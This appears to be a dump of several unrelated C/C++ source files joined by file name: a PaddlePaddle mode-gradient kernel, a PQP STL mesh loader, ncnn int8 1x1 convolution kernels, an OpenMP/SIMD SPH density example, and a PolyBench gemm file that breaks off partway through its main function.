auto in_dims = x->dims();
auto out_dims = indices->dims();
// axis < 0, get the real axis
axis = (axis < 0) ? (in_dims.size() + axis) : axis;
if (!keepdim) {
std::vector<int> tmp_out_shape;
for (int i = 0; i < axis; i++) {
tmp_out_shape.emplace_back(out_dims[i]);
}
tmp_out_shape.emplace_back(1);
for (int i = axis + 1; i < in_dims.size(); i++) {
tmp_out_shape.emplace_back(out_dims[i - 1]);
}
out_dims = framework::make_ddim(tmp_out_shape);
}
T* x_grad_data = x_grad->mutable_data<T>(context.GetPlace());
if (axis == in_dims.size() - 1) {
// allocate the memory for the input_grad
// assign the out_grad to input_grad directly
const int64_t input_height = framework::product(
framework::slice_ddim(in_dims, 0, in_dims.size() - 1));
const int64_t input_width = in_dims[in_dims.size() - 1];
// init the output grad with 0, because some input elements have no grad
memset(x_grad_data, 0, x_grad->numel() * sizeof(T));
// Assign the output_grad to input_grad
if (keepdim) {
ModeAssign(input_height, input_width, in_dims.size(), out_grad, indices,
x_grad_data);
} else {
auto& dev_context =
context.template device_context<platform::CPUDeviceContext>();
framework::Tensor out_grad_tmp;
framework::Tensor indices_tmp;
out_grad_tmp.mutable_data<T>(out_grad->dims(), dev_context.GetPlace());
indices_tmp.mutable_data<int64_t>(indices->dims(),
dev_context.GetPlace());
framework::TensorCopy(*out_grad, dev_context.GetPlace(), dev_context,
&out_grad_tmp);
framework::TensorCopy(*indices, dev_context.GetPlace(), dev_context,
&indices_tmp);
out_grad_tmp.Resize(out_dims);
indices_tmp.Resize(out_dims);
ModeAssign(input_height, input_width, in_dims.size(), &out_grad_tmp,
&indices_tmp, x_grad_data);
}
} else {
// can not assign grad to input_grad, must do the transpose
std::vector<int> trans_axis;
for (int i = 0; i < axis; i++) {
trans_axis.emplace_back(i);
}
trans_axis.emplace_back(out_dims.size() - 1);
for (int i = axis + 1; i < out_dims.size() - 1; i++) {
trans_axis.emplace_back(i);
}
trans_axis.emplace_back(axis);
framework::DDim trans_shape(out_dims);
framework::DDim trans_in_shape(in_dims);
for (size_t i = 0; i < trans_axis.size(); i++) {
trans_shape[i] = out_dims[trans_axis[i]];
trans_in_shape[i] = in_dims[trans_axis[i]];
}
// transpose the out_grad, indices
framework::Tensor trans_dO;
trans_dO.mutable_data<T>(trans_shape, context.GetPlace());
framework::Tensor trans_ind;
trans_ind.mutable_data<int64_t>(trans_shape, context.GetPlace());
int ndims = trans_axis.size();
auto& dev_context =
context.template device_context<platform::CPUDeviceContext>();
if (keepdim) {
// Do transpose
TransCompute<platform::CPUDeviceContext, T>(
ndims, dev_context, *out_grad, &trans_dO, trans_axis);
TransCompute<platform::CPUDeviceContext, int64_t>(
ndims, dev_context, *indices, &trans_ind, trans_axis);
} else {
framework::Tensor out_grad_tmp;
framework::Tensor indices_tmp;
out_grad_tmp.mutable_data<T>(out_grad->dims(), dev_context.GetPlace());
indices_tmp.mutable_data<int64_t>(indices->dims(),
dev_context.GetPlace());
framework::TensorCopy(*out_grad, dev_context.GetPlace(), dev_context,
&out_grad_tmp);
framework::TensorCopy(*indices, dev_context.GetPlace(), dev_context,
&indices_tmp);
out_grad_tmp.Resize(out_dims);
indices_tmp.Resize(out_dims);
// Do transpose
TransCompute<platform::CPUDeviceContext, T>(
ndims, dev_context, out_grad_tmp, &trans_dO, trans_axis);
TransCompute<platform::CPUDeviceContext, int64_t>(
ndims, dev_context, indices_tmp, &trans_ind, trans_axis);
}
const int64_t input_height = framework::product(
framework::slice_ddim(trans_in_shape, 0, trans_in_shape.size() - 1));
const int64_t input_width = trans_in_shape[trans_in_shape.size() - 1];
// Assign the out_grad to the transposed input_grad
framework::Tensor tmp_out;
T* t_out = tmp_out.mutable_data<T>(trans_in_shape, context.GetPlace());
memset(t_out, 0, x_grad->numel() * sizeof(T));
ModeAssign<T, int64_t>(input_height, input_width, in_dims.size(),
&trans_dO, &trans_ind, t_out);
// Transpose back
TransCompute<platform::CPUDeviceContext, T>(ndims, dev_context, tmp_out,
x_grad, trans_axis);
}
}
};
} // namespace operators
} // namespace paddle
|
pqpmesh.h | #ifndef GCOP_PQPMESH_H
#define GCOP_PQPMESH_H
#include "PQP.h"
#include <assert.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>
#include <vector>
#include <tf/LinearMath/Transform.h>
/**
* Load a STL Mesh into PQP Model
* Currently Uses tf but can be replaced by Eigen vectors
*/
class PqpMesh{
public:
/** Constructor with STL file name. Creates an internal PQP Model
* @param filename File name for loading stl model
* @param scale Scale for scaling vertices of the mesh
*/
PqpMesh(const char *filename, const double *scale_ = 0);
/** Default constructor with model being two triangles forming the head of an arrow
* @param cr collision radius
*/
PqpMesh(double cr);
/** Default Constructor does not do anything
*/
PqpMesh()
{
}
/** Get current state of mesh as a transform (origin and rotation)
*/
tf::Transform GetState();
virtual ~PqpMesh();
PQP_Model *pm; ///< Model
PQP_REAL pt[3]; ///< Origin
PQP_REAL pR[3][3]; ///< Rotation Matrix
double scale[3]; ///< Scale of STL file
};
PqpMesh::PqpMesh(double cr)
{
pm = new PQP_Model;
PQP_REAL p1[3], p2[3], p3[3], p4[3];
pm->BeginModel();
p1[0] = 0; p1[1] = cr; p1[2] = 0;
p2[0] = 0; p2[1] = -cr; p2[2] = 0;
p3[0] = cr; p3[1] = 0; p3[2] = 0;
pm->AddTri(p1, p2, p3, 0);
p1[0] = 0; p1[1] = 0; p1[2] = cr;
p2[0] = 0; p2[1] = 0; p2[2] = -cr;
p3[0] = cr; p3[1] = 0; p3[2] = 0;
pm->AddTri(p1, p2, p3, 1);
// TODO: Do we need more triangles opposite to these ones in coordinate space?
pm->EndModel();
pm->MemUsage(1);
//Set Initial mesh origin (0,0,0) and Rotation as Identity
pt[0] = pt[1] = pt[2] = 0;
pR[0][0] = pR[1][1] = pR[2][2] = 1.0;
pR[0][1] = pR[1][0] = pR[2][0] = 0.0;
pR[0][2] = pR[1][2] = pR[2][1] = 0.0;
scale[0] = scale[1] = scale[2] = 0;
}
PqpMesh::PqpMesh(const char *filename, const double *scale_)
{
pm = new PQP_Model;
if(scale_ != 0)
{
memcpy(scale,scale_,3*sizeof(double));
}
else
{
scale[0] = scale[1] = scale[2] = 1.0;//Set scale 1
}
pm->BeginModel();
//Loading File:
FILE* file = fopen(filename,"rb");
if(file)
{
int size=0;
if (fseek(file, 0, SEEK_END) || (size = ftell(file)) == EOF || fseek(file, 0, SEEK_SET))
{
printf("Error: Cannot access file to determine size of %s\n", filename);
}
else
{
if (size)
{
printf("Open STL file of %d bytes\n",size);
char* memoryBuffer = new char[size+1];
int actualBytesRead = fread(memoryBuffer,1,size,file);
if (actualBytesRead!=size)
{
printf("Error reading from file %s",filename);
}
else
{
int numTriangles = *(int*)&memoryBuffer[80];
if (numTriangles)
{
{
//perform a sanity check instead of crashing on invalid triangles/STL files
int expectedBinaryFileSize = numTriangles* 50 + 84;
if (expectedBinaryFileSize != size)
{
delete[] memoryBuffer;
fclose(file);
return;
}
}
//Looping through the triangles and setting the triangles in PQP
{
int i;
float *vert_temp = (float *)malloc(3*3*numTriangles*sizeof(float));
PQP_REAL p1[3], p2[3], p3[3];//Points of Triangle in PQP Mesh
//tf::Vector3 edge1, edge2, edge3, unit_normal;
#pragma omp parallel for private(i,p1,p2,p3) // p1..p3 are per-thread scratch; note PQP's AddTri may itself not be thread-safe
for (i=0;i<numTriangles;i++)
{
memcpy(&vert_temp[9*i],&memoryBuffer[96+i*50],36);//9 floats of 4 bytes each (3 floats per vertex); 96 = 84-byte preamble + 12-byte normal
//Cast Vertices into PQP Reals
p1[0] = scale[0]*vert_temp[9*i]; p1[1] = scale[1]*vert_temp[9*i+1]; p1[2] = scale[2]*vert_temp[9*i+2];
p2[0] = scale[0]*vert_temp[9*i+3]; p2[1] = scale[1]*vert_temp[9*i+4]; p2[2] = scale[2]*vert_temp[9*i+5];
p3[0] = scale[0]*vert_temp[9*i+6]; p3[1] = scale[1]*vert_temp[9*i+7]; p3[2] = scale[2]*vert_temp[9*i+8];
//Add Triangle to PQP
pm->AddTri(p1, p2, p3, i);
/*
// Add Normal to Model:
edge1.setX(p2[0] - p1[0]); edge1.setY(p2[1] - p1[1]); edge1.setZ(p2[2] - p1[2]);
edge2.setX(p3[0] - p2[0]); edge2.setY(p3[1] - p2[1]); edge2.setZ(p3[2] - p2[2]);
//edge3.setX(p1[0] - p3[0]); edge3.setY(p1[1] - p3[1]); edge3.setZ(p1[2] - p3[2]);
unit_normal = (edge1.cross(edge2)).normalized();
normals.push_back(unit_normal);
*/
//#DEBUG
/*printf("Normal: %f,%f,%f\n",unit_normal.x(),unit_normal.y(),unit_normal.z());
printf("Vertices1: %f,%f,%f\n",p1[0],p1[1],p1[2]);
printf("Vertices2: %f,%f,%f\n",p2[0],p2[1],p2[2]);
printf("Vertices3: %f,%f,%f\n",p3[0],p3[1],p3[2]);
*/
}
free(vert_temp); // release the temporary vertex staging buffer
}
}
delete[] memoryBuffer;
}
}
fclose(file);
}
}
pm->EndModel();
pm->MemUsage(1);
pt[0] = pt[1] = pt[2] = 0;
pR[0][0] = pR[1][1] = pR[2][2] = 1.0;
pR[0][1] = pR[1][0] = pR[2][0] = 0.0;
pR[0][2] = pR[1][2] = pR[2][1] = 0.0;
}
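/* For reference, the binary STL layout assumed by the loader above:
 *   bytes  0..79 : header (ignored)
 *   bytes 80..83 : uint32 triangle count
 *   then 50 bytes per triangle: 12-byte normal, three 12-byte vertices,
 *   2-byte attribute; hence vertex data of triangle i starts at
 *   84 + 50*i + 12 = 96 + 50*i and the file size must be 84 + 50*numTriangles.
 */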
tf::Transform PqpMesh::GetState()
{
tf::Transform t;
t.setOrigin(tf::Vector3(pt[0],pt[1],pt[2]));
tf::Matrix3x3 rotation;
rotation[0][0] = pR[0][0]; rotation[0][1] = pR[0][1]; rotation[0][2] = pR[0][2];
rotation[1][0] = pR[1][0]; rotation[1][1] = pR[1][1]; rotation[1][2] = pR[1][2];
rotation[2][0] = pR[2][0]; rotation[2][1] = pR[2][1]; rotation[2][2] = pR[2][2];
t.setBasis(rotation);
return t;
}
PqpMesh::~PqpMesh()
{
delete pm;
}
#endif
|
convolution_1x1_int8.h | // SenseNets is pleased to support the open source community by supporting ncnn available.
//
// Copyright (C) 2018 SenseNets Technology Ltd. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
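// 1x1 convolution, stride 1, int8 inputs/kernel with int32 accumulation:
// each output channel is filled by accumulating per-pixel scalar products
// over the input channels, unrolled 8 input channels at a time with a
// scalar tail loop for the remainder.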
static void conv1x1s1_int8_sse(const Mat &bottom_blob, Mat &top_blob, const Mat &_kernel, const Option& opt)
{
int inch = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
const signed char *kernel = _kernel;
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
Mat out0 = top_blob.channel(p);
out0.fill(0);
int q = 0;
for (; q+7<inch; q+=8)
{
int* outptr0 = out0;
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
const signed char *r0 = bottom_blob.channel(q);
const signed char *r1 = bottom_blob.channel(q + 1);
const signed char *r2 = bottom_blob.channel(q + 2);
const signed char *r3 = bottom_blob.channel(q + 3);
const signed char *r4 = bottom_blob.channel(q + 4);
const signed char *r5 = bottom_blob.channel(q + 5);
const signed char *r6 = bottom_blob.channel(q + 6);
const signed char *r7 = bottom_blob.channel(q + 7);
int size = outw * outh;
int remain = size;
for (; remain > 0; remain--)
{
//ToDo Neon
int sum0 = (int)*r0 * (int)kernel0[0] + (int)*r1 * (int)kernel0[1] +
(int)*r2 * (int)kernel0[2] + (int)*r3 * (int)kernel0[3] +
(int)*r4 * (int)kernel0[4] + (int)*r5 * (int)kernel0[5] +
(int)*r6 * (int)kernel0[6] + (int)*r7 * (int)kernel0[7];
*outptr0 += sum0;
r0++;
r1++;
r2++;
r3++;
r4++;
r5++;
r6++;
r7++;
outptr0++;
}
}
for (; q<inch; q++)
{
int* outptr0 = out0;
const signed char *r0 = bottom_blob.channel(q);
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
const signed char k0 = kernel0[0];
int size = outw * outh;
int remain = size;
for (; remain > 0; remain--)
{
int sum0 = (int)(*r0) * (int)k0;
*outptr0 += sum0;
r0++;
outptr0++;
}
}
}
}
static void conv1x1s2_int8_sse(const Mat &bottom_blob, Mat &top_blob, const Mat &_kernel, const Option& opt)
{
int w = bottom_blob.w;
int inch = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
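// tailstep: after reading outw stride-2 samples the row pointer sits at
// 2*outw, so advance by (w - 2*outw) to finish the row plus w to skip the
// next row (vertical stride 2)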
const int tailstep = w - 2*outw + w;
const signed char *kernel = _kernel;
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
Mat out0 = top_blob.channel(p);
out0.fill(0);
int q = 0;
for (; q+7<inch; q+=8)
{
int* outptr0 = out0;
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
const signed char *r0 = bottom_blob.channel(q);
const signed char *r1 = bottom_blob.channel(q + 1);
const signed char *r2 = bottom_blob.channel(q + 2);
const signed char *r3 = bottom_blob.channel(q + 3);
const signed char *r4 = bottom_blob.channel(q + 4);
const signed char *r5 = bottom_blob.channel(q + 5);
const signed char *r6 = bottom_blob.channel(q + 6);
const signed char *r7 = bottom_blob.channel(q + 7);
for(int i = 0; i < outh; i++)
{
int remain = outw;
for (; remain > 0; remain--)
{
//ToDo Neon
int sum0 = (int)*r0 * (int)kernel0[0] + (int)*r1 * (int)kernel0[1] +
(int)*r2 * (int)kernel0[2] + (int)*r3 * (int)kernel0[3] +
(int)*r4 * (int)kernel0[4] + (int)*r5 * (int)kernel0[5] +
(int)*r6 * (int)kernel0[6] + (int)*r7 * (int)kernel0[7];
*outptr0 += sum0;
r0 += 2;
r1 += 2;
r2 += 2;
r3 += 2;
r4 += 2;
r5 += 2;
r6 += 2;
r7 += 2;
outptr0++;
}
r0 += tailstep;
r1 += tailstep;
r2 += tailstep;
r3 += tailstep;
r4 += tailstep;
r5 += tailstep;
r6 += tailstep;
r7 += tailstep;
}
}
for (; q<inch; q++)
{
int* outptr0 = out0;
const signed char *r0 = bottom_blob.channel(q);
const signed char *kernel0 = (const signed char *)kernel + p * inch + q;
for(int i = 0; i < outh; i++)
{
int remain = outw;
for (; remain > 0; remain--)
{
//ToDo Neon
int sum0 = (int)*r0 * (int)kernel0[0];
*outptr0 += sum0;
r0 += 2;
outptr0++;
}
r0 += tailstep;
}
}
}
}
|
example_07-StructOfArrays-CellLinkedList-InnerOmp-SIMD.c | /*
* SPDX-License-Identifier: BSD-3-Clause
*
* example_07-StructOfArrays-CellLinkedList-InnerOmp-SIMD.c :
* Example of SPH Density Calculation using
* fast neighbor search the main density loop via
* Cell Linked List method, Struct of Arrays (SoA)
* data layout, OpenMP parallelization at the
* chunk level, SIMD directives in the kernel
* and in the main loop.
*
* (C) Copyright 2021 José Hugo Elsas
* Author: José Hugo Elsas <jhelsas@gmail.com>
*
* Command Line Options:
* -runs <int> : Set the number of repetitions (runs) for
* calculating the density. The value of
* the density is based on the last
* iteration.
* Default value: 1
* -run_seed <int>: Flag to set an alternative seed to use
* for the PRNG. Instead of feeding seed
* to the PRNG directly, it feeds
* seed + iteration, as to generate different
* configurations for each iteration.
* Default value: 0 - (possible 0/1)
* -seed <int>: Set the seed to use for the SPH particles
* uniform position generation in the box
* Default value: 123123123
*
* -N <int>: Set the number of SPH particles to be used
* Default value: 1e5 = 100,000
* -h <float>: Set the value of the smoothing kernel
* parameter h, which corresponds to half
* of the support of the kernel.
* Default value: 0.05
*
* -Nx <int>: Set the number of Cells in the X direction
* Default value: 10
* -Ny <int>: Set the number of Cells in the Y direction
* Default value: 10
* -Nz <int>: Set the number of Cells in the Z direction
* Default value: 10
*
* -Xmin <float>: Set the lower bound in the X direction for
* the Cell Linked List box
* Default value: 0.0
* -Ymin <float>: Set the lower bound in the Y direction for
* the Cell Linked List box
* Default value: 0.0
* -Zmin <float>: Set the lower bound in the Z direction for
* the Cell Linked List box
* Default value: 0.0
*
* -Xmax <float>: Set the upper bound in the X direction for
* the Cell Linked List box
* Default value: 1.0
* -Ymax <float>: Set the upper bound in the Y direction for
* the Cell Linked List box
* Default value: 1.0
* -Zmax <float>: Set the upper bound in the Z direction for
* the Cell Linked List box
* Default value: 1.0
*/
#include <math.h>
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>
#include <unistd.h>
#include <stdbool.h>
#include <sys/time.h>
#include <inttypes.h>
#include <omp.h>
#include <gsl/gsl_math.h>
#include <gsl/gsl_rng.h>
#include <gsl/gsl_randist.h>
#include <gsl/gsl_heapsort.h>
#include "sph_data_types.h"
#include "sph_linked_list.h"
#include "sph_utils.h"
#ifndef M_PI
#define M_PI (3.14159265358979323846)
#endif
#define COMPUTE_BLOCKS 5
int main_loop(int run, bool run_seed, int64_t N, double h, long int seed,
void *swap_arr, linkedListBox *box, SPHparticle *lsph, double *times);
int compute_density_3d_innerOmp(int N, double h, SPHparticle *lsph, linkedListBox *box);
int compute_density_3d_chunk(int64_t node_begin, int64_t node_end,
int64_t nb_begin, int64_t nb_end,double h,
double* restrict x, double* restrict y,
double* restrict z, double* restrict nu,
double* restrict rho);
double w_bspline_3d_constant(double h);
#pragma omp declare simd
double w_bspline_3d_simd(double q);
int main(int argc, char **argv){
bool run_seed = false; // By default the behavior is to use the same seed
int runs = 1,err; // it only runs once
long int seed = 123123123; // The default seed is 123123123
int64_t N = 100000; // The default number of particles is N = 1e5 = 100,000
double h=0.05; // The default kernel smoothing length is h = 0.05
linkedListBox *box; // Uninitialized Box containing the cells for the cell linked list method
SPHparticle *lsph; // Uninitialized array of SPH particles
box = (linkedListBox*)malloc(1*sizeof(linkedListBox)); // Create a box representing the entire 3d domain
// allow for command line customization of the run
arg_parse(argc,argv,&N,&h,&seed,&runs,&run_seed,box); // Parse the command line options
// line arguments and override default values
err = SPHparticle_SoA_malloc(N,&lsph);
if(err)
fprintf(stderr,"error in SPHparticle_SoA_malloc\n");
void *swap_arr = malloc(N*sizeof(double));
double times[runs*COMPUTE_BLOCKS];
for(int run=0;run<runs;run+=1)
main_loop(run,run_seed,N,h,seed,swap_arr,box,lsph,times);
bool is_cll = true;
const char *prefix = "ex07,cll,SoA,inner,simd";
print_time_stats(prefix,is_cll,N,h,seed,runs,lsph,box,times);
print_sph_particles_density(prefix,is_cll,N,h,seed,runs,lsph,box);
SPHparticleSOA_safe_free(N,&lsph);
safe_free_box(box);
free(swap_arr);
return 0;
}
/*
* Function main_loop:
* Runs the main loop of the program, including the particle array generation,
* density calculation and the timings annotations.
*
* Arguments:
* run <int> : index (or value) or the present iteration
* run_seed <bool> : boolean defining whether to use run index for seed or not
* N <int> : Number of SPH particles to be used in the run
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* seed <long int> : seed for GSL PRNG generator to generate particle positions
* box <linkedListBox> : Box of linked list cells, encapsulating the 3d domain
* lsph <SPHparticle> : Array (pointer) of SPH particles to be updated
* times <double> : Array to store the computation timings to be updated
* Returns:
* 0 : error code returned
* lsph <SPHparticle> : SPH particle array is updated in the rho field by reference
* times <double> : Times is updated by reference
*/
int main_loop(int run, bool run_seed, int64_t N, double h, long int seed,
void *swap_arr, linkedListBox *box, SPHparticle *lsph, double *times)
{
int err;
if(run_seed)
err = gen_unif_rdn_pos_box(N,seed+run,box,lsph);
else
err = gen_unif_rdn_pos_box(N,seed,box,lsph);
if(err)
fprintf(stderr,"error in gen_unif_rdn_pos\n");
// ------------------------------------------------------ //
double t0,t1,t2,t3,t4,t5;
t0 = omp_get_wtime();
err = compute_hash_MC3D(N,lsph,box); // Compute Morton Z 3D hash based on the
if(err) // cell index for each of the X, Y and Z
fprintf(stderr,"error in compute_hash_MC3D\n"); // directions, in which a given particle reside
t1 = omp_get_wtime();
qsort(lsph->hash,N,2*sizeof(int64_t),compare_int64_t); // Sort the particle hashes, getting the shuffled
// index necessary to re-shuffle the remaining arrays
t2 = omp_get_wtime();
err = reorder_lsph_SoA(N,lsph,swap_arr); // Reorder all arrays according to the sorted hash,
if(err) // As to have a quick way to retrieve a cell
fprintf(stderr,"error in reorder_lsph_SoA\n"); // given its hash.
t3 = omp_get_wtime();
err = setup_interval_hashtables(N,lsph,box); // Annotate the beginning and end of each cell
if(err) // on the cell linked list method for fast
fprintf(stderr,"error in setup_interval_hashtables\n"); // neighbor search
t4 = omp_get_wtime();
err = compute_density_3d_innerOmp(N,h,lsph,box); // Compute the density of the particles based
if(err) // on the cell linked list method for fast
fprintf(stderr,"error in compute_density\n"); // neighbor search
// ------------------------------------------------------ //
t5 = omp_get_wtime();
times[COMPUTE_BLOCKS*run+0] = t1-t0; // Time for compute morton Z 3d hash
times[COMPUTE_BLOCKS*run+1] = t2-t1; // Time for sorting the particles' hashes
times[COMPUTE_BLOCKS*run+2] = t3-t2; // Time for reordering all other arrays accordingly
times[COMPUTE_BLOCKS*run+3] = t4-t3; // Time for setting up the interval hash tables
times[COMPUTE_BLOCKS*run+4] = t5-t4; // Time for computing the SPH particle densities
return 0;
}
/*
* Function compute_density_3d_innerOmp:
* Computes the SPH density from the particles using cell linked list,
* with parallelization at the level of the outer-most loop of the chunk
* contribution calculation and vectorization in the inner-most loop.
*
* Arguments:
* N <int> : Number of SPH particles to be used in the run
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* lsph <SPHparticle> : Array (pointer) of SPH particles to be updated
* Returns:
* 0 : error code returned
* lsph <SPHparticle> : SPH particle array is updated in the rho field by reference
*/
int compute_density_3d_innerOmp(int N, double h, SPHparticle *lsph, linkedListBox *box){
khiter_t kbegin,kend;
int64_t node_hash=-1,node_begin=0, node_end=0; // Start initializing the node indexes on the array
int64_t nb_begin= 0, nb_end = 0; // initialize the neighbor indexes
int64_t nblist[(2*box->width+1)*(2*box->width+1)*(2*box->width+1)]; // prepare a list of potential neighbor hashes
memset(lsph->rho,(int)0,N*sizeof(double)); // Pre-initialize the density to zero
for (kbegin = kh_begin(box->hbegin); kbegin != kh_end(box->hbegin); kbegin++){ // Iterate over each receiver cell begin index
if (kh_exist(box->hbegin, kbegin)){ // verify if that given iterator actually exists
kend = kh_get(1, box->hend, kh_key(box->hbegin, kbegin)); // Then get the end of the receiver cell iterator
node_hash = kh_key(box->hbegin, kbegin); // Then get the hash corresponding to it
node_begin = kh_value(box->hbegin, kbegin); // Get the receiver cell begin index in the array
node_end = kh_value(box->hend, kend); // Get the receiver cell end index in the array
neighbour_hash_3d(node_hash,nblist,box->width,box); // then find the hashes of its neighbors
for(int j=0;j<(2*box->width+1)*(2*box->width+1)*(2*box->width+1);j+=1){ // and the iterate over them
if(nblist[j]>=0){ // if a given neighbor actually has particles
nb_begin = kh_value(box->hbegin, kh_get(0, box->hbegin, nblist[j]) ); // then get the contributing cell begin index
nb_end = kh_value(box->hend , kh_get(1, box->hend , nblist[j]) ); // and get the contributing cell end index
compute_density_3d_chunk(node_begin,node_end,nb_begin,nb_end,h, // and compute the density contribution from
lsph->x,lsph->y,lsph->z,lsph->nu,lsph->rho); // the contributing cell to the receiver cell
}
}
}
}
return 0;
}
/*
* Function compute_density_3d_chunk:
* Computes the SPH density contribution for a pair of cells, from nb_ indexes
* to the node_ indexes. The computation is performed in parallel at the
* level of the node_ index, the outer-most, but with vectorization in
* the inner-most loop.
*
* Arguments:
* node_begin <int> : Begin index of the receiver cell
* node_end <int> : End index of the receiver cell
* nb_begin <int> : Begin index of the sender (neighbor) cell
* nb_end <int> : End index of the sender (neighbor) cell
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* x <double*> : Array of particles' X positions
* y <double*> : Array of particles' Y positions
* z <double*> : Array of particles' Z positions
* nu <double*> : Array of particles' density weights (i.e. masses)
* Returns:
* 0 : error code returned
* rho <double*> : Array of particles' densities
*/
int compute_density_3d_chunk(int64_t node_begin, int64_t node_end,
int64_t nb_begin, int64_t nb_end,double h,
double* restrict x, double* restrict y,
double* restrict z, double* restrict nu,
double* restrict rho){
const double inv_h = 1./h;
const double kernel_constant = w_bspline_3d_constant(h);
#pragma omp parallel for // Execute the outer loop in parallel
for(int64_t ii=node_begin;ii<node_end;ii+=1){ // Iterate over the ii index of the chunk
double xii = x[ii]; // Load the X component of the ii particle position
double yii = y[ii]; // Load the Y component of the ii particle position
double zii = z[ii]; // Load the Z component of the ii particle position
double rhoii = 0.0; // Initialize the chunk contribution to density
#pragma omp simd // Hint at the compiler to vectorize
for(int64_t jj=nb_begin;jj<nb_end;jj+=1){ // Iterate over the each other particle in jj loop
double q = 0.; // Initialize the distance
double xij = xii-x[jj]; // Load and subtract jj particle's X position component
double yij = yii-y[jj]; // Load and subtract jj particle's Y position component
double zij = zii-z[jj]; // Load and subtract jj particle's Z position component
q += xij*xij; // Add the jj contribution to the ii distance in X
q += yij*yij; // Add the jj contribution to the ii distance in Y
q += zij*zij; // Add the jj contribution to the ii distance in Z
q = sqrt(q)*inv_h; // Sqrt to compute the distance
rhoii += nu[jj]*w_bspline_3d_simd(q); // Add up the contribution from the jj particle
} // to the intermediary density and then
rho[ii] += rhoii*kernel_constant; // add the intermediary density to the full density
}
return 0;
}
/*
* Function w_bspline_3d_constant:
* Returns the 3d normalization constant for the cubic b-spline SPH smoothing kernel
*
* Arguments:
* h <double> : Smoothing Length for the Smoothing Kernel w_bspline
* Returns:
* 3d bspline normalization density <double>
*/
double w_bspline_3d_constant(double h){
return 3./(2.*M_PI*h*h*h); // 3d normalization value for the b-spline kernel
}
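/*
 * For reference, the cubic b-spline kernel pieces evaluated in
 * w_bspline_3d_simd below, with q = |r_ij|/h and C(h) = 3/(2*pi*h^3)
 * as returned above:
 *   W(q) = C(h) * (2/3 - q^2 + q^3/2)   for 0 <= q < 1
 *   W(q) = C(h) * (2 - q)^3 / 6         for 1 <= q < 2
 *   W(q) = 0                            for q >= 2
 */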
/*
* Function w_bspline_3d_simd:
* Returns the un-normalized value of the cubic b-spline SPH smoothing kernel
*
* Arguments:
* q <double> : Distance between particles normalized by the smoothing length h
* Returns:
* wq <double> : Unnormalized value of the kernel
*
* Observation:
* Why not else if(q<2.)?
* Because if you use "else if", the compiler refuses to vectorize,
* This results in a large slowdown, as of 2.5x slower for example_04
*/
#pragma omp declare simd
double w_bspline_3d_simd(double q){
double wq=0;
double wq1 = (0.6666666666666666 - q*q + 0.5*q*q*q); // The first polynomial of the spline
double wq2 = 0.16666666666666666*(2.-q)*(2.-q)*(2.-q); // The second polynomial of the spline
if(q<2.) // If the distance is below 2
wq = wq2; // Use the 2nd polynomial for the spline
if(q<1.) // If the distance is below 1
wq = wq1; // Use the 1st polynomial for the spline
return wq; // return which ever value corresponds to the distance
} |
expected_output.c | #include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <math.h>
#include <polybench.h>
#include "gemm.h"
/**
* This version is stamped on May 10, 2016
*
* Contact:
* Louis-Noel Pouchet <pouchet.ohio-state.edu>
* Tomofumi Yuki <tomofumi.yuki.fr>
*
* Web address: http://polybench.sourceforge.net
*/
/*gemm.c: this file is part of PolyBench/C*/
/*Include polybench common header.*/
/*Include benchmark-specific header.*/
/*Array initialization.*/
static void init_array(int ni, int nj, int nk, double *alpha, double *beta, double C[1000][1100], double A[1000][1200], double B[1200][1100]) {
int i, j;
*alpha = 1.5;
*beta = 1.2;
for(i = 0; i < ni; i++)
for(j = 0; j < nj; j++)
C[i][j] = (double) ((i * j + 1) % ni) / ni;
for(i = 0; i < ni; i++)
for(j = 0; j < nk; j++)
A[i][j] = (double) (i * (j + 1) % nk) / nk;
for(i = 0; i < nk; i++)
for(j = 0; j < nj; j++)
B[i][j] = (double) (i * (j + 2) % nj) / nj;
}
/*DCE code. Must scan the entire live-out data.
Can be used also to check the correctness of the output.*/
static void print_array(int ni, int nj, double C[1000][1100]) {
int i, j;
fprintf(stderr, "==BEGIN DUMP_ARRAYS==\n");
fprintf(stderr, "begin dump: %s", "C");
for(i = 0; i < ni; i++)
for(j = 0; j < nj; j++) {
if((i * ni + j) % 20 == 0) fprintf(stderr, "\n");
fprintf(stderr, "%0.2lf ", C[i][j]);
}
fprintf(stderr, "\nend dump: %s\n", "C");
fprintf(stderr, "==END DUMP_ARRAYS==\n");
}
/*Main computational kernel. The whole function will be timed,
including the call and return.*/
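/* kernel_gemm computes C = beta*C + alpha*A*B; the OpenMP pragma splits the
   outer i loop so each thread updates a disjoint set of rows of C. */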
static void kernel_gemm(int ni, int nj, int nk, double alpha, double beta, double C[1000][1100], double A[1000][1200], double B[1200][1100]) {
int i, j, k;
#pragma omp parallel for default(shared) private(i, j, k) firstprivate(ni, nj, beta, nk, alpha, A, B)
for(i = 0; i < ni; i++) {
// #pragma omp parallel for default(shared) private(j) firstprivate(nj, i, beta)
for(j = 0; j < nj; j++)
C[i][j] *= beta;
// #pragma omp parallel for default(shared) private(k, j) firstprivate(nk, nj, alpha, i, A, B)
for(k = 0; k < nk; k++) {
// #pragma omp parallel for default(shared) private(j) firstprivate(nj, alpha, i, k, A, B)
for(j = 0; j < nj; j++)
C[i][j] += alpha * A[i][k] * B[k][j];
}
}
}
int main(int argc, char **argv) {
/*Retrieve problem size.*/
int ni = 1000;
int nj = 1100;
int nk = 1200;
/*Variable declaration/allocation.*/
double alpha;
double beta;
